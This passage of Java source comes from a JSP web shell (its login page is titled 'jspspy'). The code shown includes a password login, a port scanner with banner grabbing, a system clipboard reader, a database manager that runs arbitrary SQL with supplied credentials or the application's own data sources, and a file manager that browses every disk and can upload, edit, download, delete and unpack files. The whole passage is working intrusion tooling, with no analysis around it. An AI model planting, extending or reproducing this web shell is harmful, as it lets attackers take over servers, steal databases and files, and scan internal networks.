1092. JSession
1093. .setAttribute(
1094. MSG,
1095. success
1096. + " Files Deleted <span style='color:green'>Success</span> , "
1097. + failed
1098. + " Files Deleted <span style='color:red'>Failed</span>!");
1099. response.sendRedirect(SHELL_NAME);
1100. } catch (Exception e) {
1101.  
1102. throw e;
1103. }
1104. }
1105. }
1106.  
1107. private static class ClipBoardInvoker extends DefaultInvoker {
1108. public void invoke(HttpServletRequest request,
1109. HttpServletResponse response, HttpSession JSession)
1110. throws Exception {
1111. try {
1112. PrintWriter out = response.getWriter();
1113. out
1114. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
1115. + " <tr>"
1116. + " <td>"
1117. + " <h2>System Clipboard &raquo;</h2>"
1118. + "<p><pre>");
1119. try {
1120. out.println(Util.htmlEncode(Util.getStr(Toolkit
1121. .getDefaultToolkit().getSystemClipboard()
1122. .getContents(DataFlavor.stringFlavor)
1123. .getTransferData(DataFlavor.stringFlavor))));
1124. } catch (Exception ex) {
1125. out.println("ClipBoard is Empty Or Is Not Text Data !");
1126. }
1127. out
1128. .println("</pre>"
1129. + " <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\" />"
1130. + " </p>" + " </td>" + " </tr>"
1131. + "</table>");
1132. } catch (Exception e) {
1133.  
1134. throw e;
1135. }
1136. }
1137. }
1138.  
1139. private static class VPortScanInvoker extends DefaultInvoker {
1140. public void invoke(HttpServletRequest request,
1141. HttpServletResponse response, HttpSession JSession)
1142. throws Exception {
1143. try {
1144. PrintWriter out = response.getWriter();
1145. String ip = request.getParameter("ip");
1146. String ports = request.getParameter("ports");
1147. String timeout = request.getParameter("timeout");
1148. String banner = request.getParameter("banner");
1149. if (Util.isEmpty(ip))
1150. ip = "127.0.0.1";
1151. if (Util.isEmpty(ports))
1152. ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
1153. if (Util.isEmpty(timeout))
1154. timeout = "2";
1155. out
1156. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1157. + "<h2 id=\"Bin_H2_Title\">PortScan &gt;&gt;</h2>"
1158. + "<div id=\"YwLB\"><form action=\""
1159. + SHELL_NAME
1160. + "\" method=\"post\">"
1161. + "<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"
1162. + "IP : <input name=\"ip\" type=\"text\" value=\""
1163. + ip
1164. + "\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""
1165. + ports
1166. + "\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> <input "
1167. + (!Util.isEmpty(banner) ? "checked" : "")
1168. + " type='checkbox' value='yes' name='banner'/>Banner Timeout (Second) : <input name=\"timeout\" type=\"text\" value=\""
1169. + timeout
1170. + "\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"
1171. + "</p>"
1172. + "</form></div>"
1173. + "</td></tr></table>");
1174. } catch (Exception e) {
1175.  
1176. throw e;
1177. }
1178. }
1179. }
1180.  
1181. private static class PortScanInvoker extends DefaultInvoker {
1182. public void invoke(HttpServletRequest request,
1183. HttpServletResponse response, HttpSession JSession)
1184. throws Exception {
1185. try {
1186. PrintWriter out = response.getWriter();
1187. ((Invoker) ins.get("vPortScan")).invoke(request, response,
1188. JSession);
1189. out.println("<hr/>");
1190. String ip = request.getParameter("ip");
1191. String ports = request.getParameter("ports");
1192. String timeout = request.getParameter("timeout");
1193. String banner = request.getParameter("banner");
1194. int iTimeout = 0;
1195. if (Util.isEmpty(ip) || Util.isEmpty(ports))
1196. return;
1197. if (!Util.isInteger(timeout)) {
1198. timeout = "2";
1199. }
1200. iTimeout = Integer.parseInt(timeout);
1201. Map rs = new LinkedHashMap();
1202. String[] portArr = ports.split(",");
1203. for (int i = 0; i < portArr.length; i++) {
1204. String port = portArr[i];
1205. BufferedReader r = null;
1206. try {
1207. Socket s = new Socket();
1208. s.connect(new InetSocketAddress(ip, Integer
1209. .parseInt(port)), iTimeout);
1210. s.setSoTimeout(iTimeout);
1211. if (!Util.isEmpty(banner)) {
1212. r = new BufferedReader(new InputStreamReader(s
1213. .getInputStream()));
1214. StringBuffer sb = new StringBuffer();
1215. String b = r.readLine();
1216. while (b != null) {
1217. sb.append(b + " ");
1218. try {
1219. b = r.readLine();
1220. } catch (Exception e) {
1221. break;
1222. }
1223. }
1224. rs.put(port,
1225. "Open <span style=\"color:grey;font-weight:normal\">"
1226. + sb.toString() + "</span>");
1227. r.close();
1228. } else {
1229. rs.put(port, "Open");
1230. }
1231. s.close();
1232. } catch (Exception e) {
1233. if (e.toString().toLowerCase()
1234. .indexOf("read timed out") != -1) {
1235. rs
1236. .put(
1237. port,
1238. "Open <span style=\"color:grey;font-weight:normal\">&lt;&lt;No Banner!&gt;&gt;</span>");
1239. if (r != null)
1240. r.close();
1241. } else {
1242. rs.put(port, "Close");
1243. }
1244. }
1245. }
1246. out.println("<div style='margin:10px'>");
1247. Set entrySet = rs.entrySet();
1248. Iterator it = entrySet.iterator();
1249. while (it.hasNext()) {
1250. Map.Entry e = (Map.Entry) it.next();
1251. String port = (String) e.getKey();
1252. String value = (String) e.getValue();
1253. out.println(ip + " : " + port
1254. + " ................................. <font color="
1255. + (value.equals("Close") ? "red" : "green")
1256. + "><b>" + value + "</b></font><br>");
1257. }
1258. out.println("</div>");
1259. } catch (Exception e) {
1260.  
1261. throw e;
1262. }
1263. }
1264. }
1265.  
1266. private static class VConnInvoker extends DefaultInvoker {
1267. public void invoke(HttpServletRequest request,
1268. HttpServletResponse response, HttpSession JSession)
1269. throws Exception {
1270. try {
1271. PrintWriter out = response.getWriter();
1272. Object obj = JSession.getAttribute(DBO);
1273. if (obj == null || !((DBOperator) obj).isValid()) {
1274. out
1275. .println(" <script type=\"text/javascript\">"
1276. + " function changeurldriver(){"
1277. + " var form = document.forms[\"form1\"];"
1278. + " var v = form.elements[\"db\"].value;"
1279. + " form.elements[\"url\"].value = v.split(\"`\")[1];"
1280. + " form.elements[\"driver\"].value = v.split(\"`\")[0];"
1281. + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"
1282. + " }" + " </script>");
1283. out
1284. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1285. + "<form name=\"form1\" id=\"form1\" action=\""
1286. + SHELL_NAME
1287. + "\" method=\"post\" >"
1288. + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"
1289. + "<h2>DataBase Manager &raquo;</h2>"
1290. + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"
1291. + "<p>"
1292. + "DataSource:"
1293. + " <input class=\"input\" name=\"dataSource\" id=\"dataSource\" type=\"text\" style=\"width:80px;\" />"
1294. + "Driver:"
1295. + " <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\" />"
1296. + "URL:"
1297. + "<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"
1298. + "UID:"
1299. + "<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"
1300. + "PWD:"
1301. + "<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"
1302. + "DataBase:"
1303. + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"
1304. + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"
1305. + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"
1306. + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"
1307. + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"
1308. + " <option value=' ` '>Other</option>"
1309. + " </select>"
1310. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"
1311. + "</p>"
1312. + "</form></table><script>changeurldriver()</script>");
1313. } else {
1314. ((Invoker) ins.get("dbc")).invoke(request, response,
1315. JSession);
1316. }
1317. } catch (ClassCastException e) {
1318. throw e;
1319. } catch (Exception e) {
1320.  
1321. throw e;
1322. }
1323. }
1324. }
1325.  
1326. //DBConnect
1327. private static class DbcInvoker extends DefaultInvoker {
1328. public void invoke(HttpServletRequest request,
1329. HttpServletResponse response, HttpSession JSession)
1330. throws Exception {
1331. try {
1332. PrintWriter out = response.getWriter();
1333. String driver = request.getParameter("driver");
1334. String url = request.getParameter("url");
1335. String uid = request.getParameter("uid");
1336. String pwd = request.getParameter("pwd");
1337. String sql = request.getParameter("sql");
1338. String dataSource = request.getParameter("dataSource");
1339. String selectDb = request.getParameter("selectDb");
1340. if (selectDb == null)
1341. selectDb = JSession.getAttribute("selectDb").toString();
1342. else
1343. JSession.setAttribute("selectDb", selectDb);
1344. Object dbo = JSession.getAttribute(DBO);
1345. if (dbo == null || !((DBOperator) dbo).isValid()) {
1346. if (dbo != null)
1347. ((DBOperator) dbo).close();
1348. if(!Util.isEmpty(dataSource)){
1349. WebApplicationContext appContext = WebApplicationContextUtils.getWebApplicationContext(JSession.getServletContext());
1350. DataSource dsObj = (DataSource) appContext.getBean(dataSource);
1351. dbo = new DBOperator(dsObj,dataSource,true);
1352. }else{
1353. dbo = new DBOperator(driver,url,uid,pwd,true);
1354. }
1355. } else {
1356. if (!Util.isEmpty(dataSource) || (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid))) {
1357. DBOperator oldDbo = (DBOperator)dbo;
1358. if(!Util.isEmpty(dataSource)){
1359. WebApplicationContext appContext = WebApplicationContextUtils.getWebApplicationContext(JSession.getServletContext());
1360. DataSource dsObj = (DataSource) appContext.getBean(dataSource);
1361. dbo = new DBOperator(dsObj,dataSource,false);
1362. }else{
1363. dbo = new DBOperator(driver,url,uid,pwd);
1364. }
1365. if (!oldDbo.equals(dbo)) {
1366. ((DBOperator)oldDbo).close();
1367. ((DBOperator)dbo).connect();
1368. } else {
1369. dbo = oldDbo;
1370. }
1371. }
1372. }
1373. DBOperator Ddbo = (DBOperator) dbo;
1374. JSession.setAttribute(DBO, Ddbo);
1375. if (!Util.isEmpty(request.getParameter("type"))
1376. && request.getParameter("type").equals("switch")) {
1377. Ddbo.getConn().setCatalog(request.getParameter("catalog"));
1378. }
1379. Util.outMsg(out, "Connect To DataBase Success!");
1380. out
1381. .println(" <script type=\"text/javascript\">"
1382. + " function changeurldriver(selectDb){"
1383. + " var form = document.forms[\"form1\"];"
1384. + " if (selectDb){"
1385. + " form.elements[\"db\"].selectedIndex = selectDb"
1386. + " }"
1387. + " var v = form.elements[\"db\"].value;"
1388. + " form.elements[\"url\"].value = v.split(\"`\")[1];"
1389. + " form.elements[\"driver\"].value = v.split(\"`\")[0];"
1390. + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"
1391. + " }" + " </script>");
1392. out
1393. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1394. + "<form name=\"form1\" id=\"form1\" action=\""
1395. + SHELL_NAME
1396. + "\" method=\"post\" >"
1397. + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""
1398. + selectDb
1399. + "\">"
1400. + "<h2>DataBase Manager &raquo;</h2>"
1401. + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"
1402. + "<p>"
1403. + "DataSource:"
1404. + " <input class=\"input\" name=\"dataSource\" value=\""+((Ddbo.dsStr==null)?"":Ddbo.dsStr)+"\" id=\"dataSource\" type=\"text\" style=\"width:80px;\" />"
1405. + "Driver:"
1406. + " <input class=\"input\" name=\"driver\" value=\""
1407. + Ddbo.driver
1408. + "\" id=\"driver\" type=\"text\" size=\"35\" />"
1409. + "URL:"
1410. + "<input class=\"input\" name=\"url\" value=\""
1411. + Ddbo.url
1412. + "\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"
1413. + "UID:"
1414. + "<input class=\"input\" name=\"uid\" value=\""
1415. + Ddbo.uid
1416. + "\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"
1417. + "PWD:"
1418. + "<input class=\"input\" name=\"pwd\" value=\""
1419. + Ddbo.pwd
1420. + "\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"
1421. + "DataBase:"
1422. + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"
1423. + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"
1424. + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"
1425. + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"
1426. + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"
1427. + " <option value=' ` '>Other</option>"
1428. + " </select>"
1429. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"
1430. + "</p>"
1431. + "</form><script>changeurldriver('"
1432. + selectDb + "')</script>");
1433. DatabaseMetaData meta = Ddbo.getConn().getMetaData();
1434. out
1435. .println("<form action=\""
1436. + SHELL_NAME
1437. + "\" method=\"POST\">"
1438. + "<p><input type=\"hidden\" name=\"selectDb\" value=\""
1439. + selectDb
1440. + "\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Version : <b style='color:red;font-size:14px'><i>"
1441. + meta.getDatabaseProductName()
1442. + " , "
1443. + meta.getDatabaseProductVersion()
1444. + "</i></b><br/>URL : <b style='color:red;font-size:14px'><i>"
1445. + meta.getURL()
1446. + "</i></b><br/>Catalog : <b style='color:red;font-size:14px'><i>"
1447. + Ddbo.getConn().getCatalog()
1448. + "</i></b><br/>UserName : <b style='color:red;font-size:14px'><i>"
1449. + meta.getUserName()
1450. + "</i></b><br/><br/></td></tr><tr><td colspan=\"2\">Run SQL query/queries on database / <b><i>Switch Database :</i></b> ");
1451. out
1452. .println("<select id=\"catalogs\" onchange=\"if (this.value == '0') return;doPost({o:'executesql',type:'switch',catalog:document.getElementById('catalogs').value})\">");
1453. out
1454. .println("<option value='0'>-- Select a DataBase --</option>");
1455. ResultSet dbs = meta.getCatalogs();
1456. try {
1457. while (dbs.next()) {
1458. out.println("<option value='" + dbs.getString(1) + "'>"
1459. + dbs.getString(1) + "</option>");
1460. }
1461. } catch (Exception ex) {
1462. }
1463. dbs.close();
1464. out
1465. .println("</select></td></tr><tr><td><textarea id=\"sql\" name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"
1466. + Util.htmlEncode(Util.getStr(sql))
1467. + "</textarea><input class=\"bt\" name=\"submit\" type=\"submit\" value=\"Query\" /> <input class=\"bt\" onclick=\"doPost({o:'export',type:'queryexp',sql:document.getElementById('sql').value})\" type=\"button\" value=\"Export\" /> <input type='button' value='Export To File' class='bt' onclick=\"doPost({o:'vExport',type:'queryexp',sql:document.getElementById('sql').value})\"></td><td nowrap style=\"padding:0 5px;\"></td></tr></table></p></form></table>");
1468. if (Util.isEmpty(sql)) {
1469. String type = request.getParameter("type");
1470. if (Util.isEmpty(type) || type.equals("switch")) {
1471. ResultSet tbs = meta.getTables(null, null, null, null);
1472. out.println(Table.rs2Table(tbs, meta
1473. .getIdentifierQuoteString(), true));
1474. tbs.close();
1475. } else if (type.equals("struct")) {
1476. String tb = request.getParameter("table");
1477. if (Util.isEmpty(tb))
1478. return;
1479. ResultSet t = meta.getColumns(null, null, tb, null);
1480. out.println(Table.rs2Table(t, "", false));
1481. t.close();
1482. }
1483. }
1484. } catch (Exception e) {
1485. JSession
1486. .setAttribute(
1487. MSG,
1488. "<span style='color:red'>Some Error Occurred. Please Check Out the StackTrace Follow.</span>"
1489. + BACK_HREF);
1490. throw e;
1491. }
1492. }
1493. }
1494.  
1495. private static class ExecuteSQLInvoker extends DefaultInvoker {
1496. public void invoke(HttpServletRequest request,
1497. HttpServletResponse response, HttpSession JSession)
1498. throws Exception {
1499. try {
1500. PrintWriter out = response.getWriter();
1501. String sql = request.getParameter("sql");
1502. String db = request.getParameter("selectDb");
1503. Object dbo = JSession.getAttribute(DBO);
1504. if (!Util.isEmpty(sql)) {
1505. if (dbo == null || !((DBOperator) dbo).isValid()) {
1506. ((Invoker) ins.get("vConn")).invoke(request, response,
1507. JSession);
1508. return;
1509. } else {
1510. ((Invoker) ins.get("dbc")).invoke(request, response,
1511. JSession);
1512. Object obj = ((DBOperator) dbo).execute(sql);
1513. if (obj instanceof ResultSet) {
1514. ResultSet rs = (ResultSet) obj;
1515. ResultSetMetaData meta = rs.getMetaData();
1516. int colCount = meta.getColumnCount();
1517. out
1518. .println("<b style=\"margin-left:15px\">Query#0 : "
1519. + Util.htmlEncode(sql)
1520. + "</b><br/><br/>");
1521. out
1522. .println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
1523. for (int i = 1; i <= colCount; i++) {
1524. out.println("<td nowrap>"
1525. + meta.getColumnName(i) + "<br><span>"
1526. + meta.getColumnTypeName(i)
1527. + "</span></td>");
1528. }
1529. out.println("</tr>");
1530. Table tb = new Table();
1531. while (rs.next()) {
1532. Row r = new Row();
1533. for (int i = 1; i <= colCount; i++) {
1534. String v = null;
1535. try {
1536. v = rs.getString(i);
1537. } catch (SQLException ex) {
1538. v = "<<Error!>>";
1539. }
1540. r.addColumn(new Column(v));
1541. }
1542. tb.addRow(r);
1543. }
1544. out.println(tb.toString());
1545. out.println("</table><br/>");
1546. rs.close();
1547. ((DBOperator) dbo).closeStmt();
1548. } else {
1549. out
1550. .println("<b style='margin-left:15px'>affected rows : <i>"
1551. + obj + "</i></b><br/><br/>");
1552. }
1553. }
1554. } else {
1555. ((Invoker) ins.get("dbc")).invoke(request, response,
1556. JSession);
1557. }
1558. } catch (Exception e) {
1559.  
1560. throw e;
1561. }
1562. }
1563. }
1564.  
1565. private static class VLoginInvoker extends DefaultInvoker {
1566. public boolean doBefore() {
1567. return false;
1568. }
1569.  
1570. public void invoke(HttpServletRequest request,
1571. HttpServletResponse response, HttpSession JSession)
1572. throws Exception {
1573. try {
1574. PrintWriter out = response.getWriter();
1575. out
1576. .println("<html><head><title>jspspy</title><style type=\"text/css\">"
1577. + " input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"
1578. + "a{font:11px Verdana;BACKGROUND: #FFFFFF;}"
1579. + " </style></head><body><form method=\"POST\" action=\""
1580. + SHELL_NAME
1581. + "\">"
1582. + "<!--<p style=\"font:11px Verdana;color:red\">Private Edition Dont Share It !</p>-->"
1583. + " <p><span style=\"font:11px Verdana;\">Password: </span>"
1584. + " <input name=\"o\" type=\"hidden\" value=\"login\">"
1585. + " <input name=\"pw\" type=\"password\" size=\"20\">"
1586. + " <input type=\"hidden\" name=\"o\" value=\"login\">"
1587. + " <input type=\"submit\" value=\"Login\"><br/>"
1588. + "<!--<span style=\"font:11px Verdana;\">Copyright &copy; 2010</span>--></p>"
1589. + " </form><span style='font-weight:bold;color:red;font-size:12px'></span></body></html>");
1590. } catch (Exception e) {
1591.  
1592. throw e;
1593. }
1594. }
1595. }
1596.  
1597. private static class LoginInvoker extends DefaultInvoker {
1598. public boolean doBefore() {
1599. return false;
1600. }
1601.  
1602. public void invoke(HttpServletRequest request,
1603. HttpServletResponse response, HttpSession JSession)
1604. throws Exception {
1605. try {
1606. String inputPw = request.getParameter("pw");
1607. if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
1608. ((Invoker) ins.get("vLogin")).invoke(request, response,
1609. JSession);
1610. return;
1611. } else {
1612. JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw);
1613. response.sendRedirect(SHELL_NAME);
1614. return;
1615. }
1616. } catch (Exception e) {
1617.  
1618. throw e;
1619. }
1620. }
1621. }
1622.  
1623. private static class MyComparator implements Comparator {
1624. public int compare(Object obj1, Object obj2) {
1625. try {
1626. if (obj1 != null && obj2 != null) {
1627. File f1 = (File) obj1;
1628. File f2 = (File) obj2;
1629. if (f1.isDirectory()) {
1630. if (f2.isDirectory()) {
1631. return f1.getName().compareTo(f2.getName());
1632. } else {
1633. return -1;
1634. }
1635. } else {
1636. if (f2.isDirectory()) {
1637. return 1;
1638. } else {
1639. return f1.getName().toLowerCase().compareTo(
1640. f2.getName().toLowerCase());
1641. }
1642. }
1643. }
1644. return 0;
1645. } catch (Exception e) {
1646. return 0;
1647. }
1648. }
1649. }
1650.  
1651. private static class FileListInvoker extends DefaultInvoker {
1652. public void invoke(HttpServletRequest request,
1653. HttpServletResponse response, HttpSession JSession)
1654. throws Exception {
1655. try {
1656. String path2View = null;
1657. PrintWriter out = response.getWriter();
1658. String path = request.getParameter("folder");
1659. String outEntry = request.getParameter("outentry");
1660. if (!Util.isEmpty(outEntry) && outEntry.equals("true")) {
1661. JSession.removeAttribute(ENTER);
1662. JSession.removeAttribute(ENTER_MSG);
1663. JSession.removeAttribute(ENTER_CURRENT_DIR);
1664. }
1665. Object enter = JSession.getAttribute(ENTER);
1666. File file = null;
1667. if (!Util.isEmpty(enter)) {
1668. if (Util.isEmpty(path)) {
1669. if (JSession.getAttribute(ENTER_CURRENT_DIR) == null)
1670. path = "/";
1671. else
1672. path = (String) (JSession
1673. .getAttribute(ENTER_CURRENT_DIR));
1674. }
1675. file = new EnterFile(path);
1676. ((EnterFile) file).setZf((String) enter);
1677. JSession.setAttribute(ENTER_CURRENT_DIR, path);
1678. } else {
1679. if (Util.isEmpty(path))
1680. path = JSession.getAttribute(CURRENT_DIR).toString();
1681. JSession.setAttribute(CURRENT_DIR, Util.convertPath(path));
1682. file = new File(path);
1683. }
1684. path2View = Util.convertPath(path);
1685. if (!file.exists()) {
1686. throw new Exception(path + "Dont Exists !");
1687. }
1688. File[] list = file.listFiles();
1689. Arrays.sort(list, new MyComparator());
1690. out.println("<div style='margin:10px'>");
1691. String cr = null;
1692. try {
1693. cr = JSession.getAttribute(CURRENT_DIR).toString()
1694. .substring(0, 3);
1695. } catch (Exception e) {
1696. cr = "/";
1697. }
1698. File currentRoot = new File(cr);
1699. out.println("<h2>File Manager - Current disk &quot;"
1700. + (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath())
1701. + "&quot; total (unknow)</h2>");
1702. out
1703. .println("<form action=\""
1704. + SHELL_NAME
1705. + "\" method=\"post\">"
1706. + "<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"
1707. + " <tr>"
1708. + " <td nowrap>Current Directory <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"
1709. + " <td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""
1710. + path2View
1711. + "\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"
1712. + " <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"
1713. + " </tr>" + "</table>" + "</form>");
1714. out
1715. .println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"
1716. + "<form action=\""
1717. + SHELL_NAME
1718. + "?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"
1719. + "<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" "
1720. + (enter == null ? "type=\"submit\""
1721. : "type=\"button\" onclick=\"alert('You Are In File Now ! Can Not Upload !')\"")
1722. + " /></div>"
1723. + "<a href=\"javascript:new fso({path:'"
1724. + Util.convertPath(WEB_ROOT)
1725. + "'}).subdir('true')\">Web Root</a>"
1726. + " | <a href=\"javascript:new fso({path:'"
1727. + Util.convertPath(SHELL_DIR)
1728. + "'}).subdir('true')\">Shell Directory</a>"
1729. + " | <a href=\"javascript:"
1730. + (enter == null ? "new fso({}).mkdir()"
1731. : "alert('You Are In File Now ! Can Not Create Directory ! ')")
1732. + "\">New Directory</a> | <a href=\"javascript:"
1733. + (enter == null ? "new fso({}).createFile()"
1734. : "alert('You Are In File Now ! Can Not Create File !')")
1735. + "\">New File</a>" + " | ");
1736. File[] roots = file.listRoots();
1737. for (int i = 0; i < roots.length; i++) {
1738. File r = roots[i];
1739. out.println("<a href=\"javascript:new fso({path:'"
1740. + Util.convertPath(r.getPath())
1741. + "'}).subdir('true');\">Disk("
1742. + Util.convertPath(r.getPath()) + ")</a>");
1743. if (i != roots.length - 1) {
1744. out.println("|");
1745. }
1746. }
1747. out.println("</td>" + "</tr></form>"
1748. + "<tr class=\"head\"><td>&nbsp;</td>"
1749. + " <td>Name</td>"
1750. + " <td width=\"16%\">Last Modified</td>"
1751. + " <td width=\"10%\">Size</td>"
1752. + " <td width=\"20%\">Read/Write/Execute</td>"
1753. + " <td width=\"22%\">&nbsp;</td>" + "</tr>");
1754. if (file.getParent() != null) {
1755. out
1756. .println("<tr class=alt1>"
1757. + "<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"
1758. + "<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"
1759. + Util.convertPath(file.getAbsolutePath())
1760. + "'}).parent()\">Goto Parent</a></td>"
1761. + "</tr>");
1762. }
1763. int dircount = 0;
1764. int filecount = 0;
1765. for (int i = 0; i < list.length; i++) {
1766. File f = list[i];
1767. if (f.isDirectory()) {
1768. dircount++;
1769. out
1770. .println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"
1771. + "<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"
1772. + "<td><a href=\"javascript:new fso({path:'"
1773. + Util.convertPath(f.getAbsolutePath())
1774. + "'}).subdir()\">"
1775. + f.getName()
1776. + "</a></td>"
1777. + "<td nowrap>"
1778. + Util.formatDate(f.lastModified())
1779. + "</td>"
1780. + "<td nowrap>--</td>"
1781. + "<td nowrap>"
1782. + f.canRead()
1783. + " / "
1784. + f.canWrite()
1785. + " / unknow</td>"
1786. + "<td nowrap>");
1787. if (enter != null)
1788. out.println("&nbsp;");
1789. else
1790. out
1791. .println("<a href=\"javascript:new fso({path:'"
1792. + Util.convertPath(f
1793. .getAbsolutePath())
1794. + "',filename:'"
1795. + f.getName()
1796. + "'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"
1797. + Util.convertPath(f
1798. .getAbsolutePath())
1799. + "'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"
1800. + Util.convertPath(f
1801. .getAbsolutePath())
1802. + "',filename:'"
1803. + f.getName()
1804. + "'}).pack(true)\">Pack</a>");
1805. out.println("</td></tr>");
1806. } else {
1807. filecount++;
1808. out
1809. .println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"
1810. + "<td width=\"2%\" nowrap><input type='checkbox' value='"
1811. + f.getName()
1812. + "'/></td>"
1813. + "<td><a href=\"javascript:new fso({path:'"
1814. + Util.convertPath(f.getAbsolutePath())
1815. + "'}).down()\">"
1816. + f.getName()
1817. + "</a></td>"
1818. + "<td nowrap>"
1819. + Util.formatDate(f.lastModified())
1820. + "</td>"
1821. + "<td nowrap>"
1822. + Util.getSize(f.length(), 'B')
1823. + "</td>"
1824. + "<td nowrap>"
1825. + ""
1826. + f.canRead()
1827. + " / "
1828. + f.canWrite()
1829. + " / unknow </td>"
1830. + "<td nowrap>"
1831. + "<a href=\"javascript:new fso({path:'"
1832. + Util.convertPath(f.getAbsolutePath())
1833. + "'}).vEdit()\">Edit</a> | "
1834. + "<a href=\"javascript:new fso({path:'"
1835. + Util.convertPath(f.getAbsolutePath())
1836. + "'}).down()\">Down</a> | "
1837. + "<a href=\"javascript:new fso({path:'"
1838. + Util.convertPath(f.getAbsolutePath())
1839. + "'}).copy()\">Copy</a>");
1840. if (enter == null) {
1841. out
1842. .println(" | <a href=\"javascript:new fso({path:'"
1843. + Util.convertPath(f
1844. .getAbsolutePath())
1845. + "'}).move()\">Move</a> | "
1846. + "<a href=\"javascript:new fso({path:'"
1847. + Util.convertPath(f
1848. .getAbsolutePath())
1849. + "'}).vEditProperty()\">Property</a> | "
1850. + "<a href=\"javascript:new fso({path:'"
1851. + Util.convertPath(f
1852. .getAbsolutePath())
1853. + "'}).enter()\">Enter</a>");
1854. if (f.getName().endsWith(".zip")
1855. || f.getName().endsWith(".jar")) {
1856. out
1857. .println(" | <a href=\"javascript:new fso({path:'"
1858. + Util.convertPath(f
1859. .getAbsolutePath())
1860. + "',filename:'"
1861. + f.getName()
1862. + "'}).unpack()\">UnPack</a>");
1863. } else if (f.getName().endsWith(".rar")) {
1864. out
1865. .println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
1866. } else {
1867. out
1868. .println(" | <a href=\"javascript:new fso({path:'"
1869. + Util.convertPath(f
1870. .getAbsolutePath())
1871. + "',filename:'"
1872. + f.getName()
